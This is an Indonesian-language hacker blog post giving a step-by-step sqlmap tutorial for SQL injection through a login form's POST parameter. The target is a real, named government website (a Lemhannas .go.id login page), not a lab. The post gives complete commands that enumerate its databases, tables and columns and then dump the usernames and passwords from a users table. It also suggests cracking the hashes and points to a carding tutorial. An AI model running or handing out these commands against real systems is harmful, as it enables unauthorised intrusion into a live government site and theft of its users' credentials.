Sunday, 20 March 2016

Tutorial Exploitation Sqlmap $POST di Linux

sampai kapan ?!

Hello Fans .-. Nuenomaru disini.
Sesuai judulnya, gua bakal Share Tutorial Exploitation Sqlmap $POST di Linux.
di tutorial ini Nue bakal praktekin di Kali Linux di leppy nue, silahkan di coba di Linux2 kesayangan anda.
SQLMAP .. apa itu SQLMAP ? 
Sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection.

kali ini ane akan ngebahas tentang.. cara exploitasi website ber bug Sql Injection $POST ..  

ok langsung kita mulai aja..


intip tutorialnya bebz ;*

target : http://datanusantara.lemhannas.go.id/home/login
$POST : login_param=1&username=dsdsads&password=dasdsa&security_code=0499
bug : password

1. Scanning Database
sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" --dbs


nah keluarkan list database nya ..

rincian:

perintah sqlmap : perintah untuk memanggil/menjalankan sqlmap
perintah -u : untuk menentukan target/site
perintah --data= : untuk menentukan $POST pada target
perintah -p : untuk menentukan parameter post manakah yang vuln
perintah --dbs : untuk mencollect Database / scanning database

2. Scanning Tables on Database

Ketika kita sudah mendapatkan list DBnya.. lalu kita scanning tables yang ada didalamnya..

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb --tables


rincian :

--tables : untuk menscanning table yang ada di dalam database yang kita pilih..
formatnya:
namadatabase -D namatablenya --tables

-D sendiri adalah sama untuk mendeteksi database yang kita pilih untuk mendapatkan tablenya..

3. Scanning Columns on Tables

setelah kita mendapatkan database dan tables nya.. sekarang kita coba collect lebih dalam lagi.. yaitu kita scann columnya..

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna --columns


rincian:

--columns adalah perintah untuk mencollect column yg berada di dalam tables..
untuk menentukan tables yang ingin kita dump columnya ketikan perintah..

-D nama database -T namatablesnya --column

4. DUMP data

akhirnya kita telah mencapai ke penghujung acara hehe...
saatnya kita sedot datanya , siapa tau ada data penting ye gak ? :v

sqlmap -u http://datanusantara.lemhannas.go.id/home/login --"data=login_param=1&username=dsdsads&password=dasdsa&security_code=0499" -p "password" -D risphate_sisdatadb -T tbl_pengguna -C username,password --dump

[Image: KaSRixl.png]

Jika ada pertanyaan seperti di atas.. itu ada lah pertanyaan " apakah kamu mau crack password di atas via dictionary based ?"
intinya ente mau di crack otomatis gak ? pake wordlist yg di sediakan sqlmap ? jika iya ketik Y / enter saja
jika tidak ketik N..


Taraa.. data pun ter dump..

kalian bisa juga mengcrack nya di HashKiller.co.uk

Baca Juga yak:
Scan vuln SQL Injection menggunakan NMAP di Linux
Tutorial Carding dengan SQL Map

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")

Salam para penjinak pinguin :v , Penunggang Naga,  Viva Real Tux Warrior Gaes :'v wkkwkwkw


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Pentesting and suntikan awkkawaw.
Sekian dan semoga bermanfaat .. terimakasih

Aloo Gengs, sekarang waktunya Nue dan tim katakan Putus cabut dulu Gengs...
karna bsk udah Mulai Ujian Akhir Sekolah Gengs.. akawkwa
Bye..






source and thanks to: KCnewbie | Forum BackBox Indonesia




./Nuenomaru








Topi kebelakang, Mata ku jauh Menatap KeDepan ;)

















Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

2 comments


EmoticonEmoticon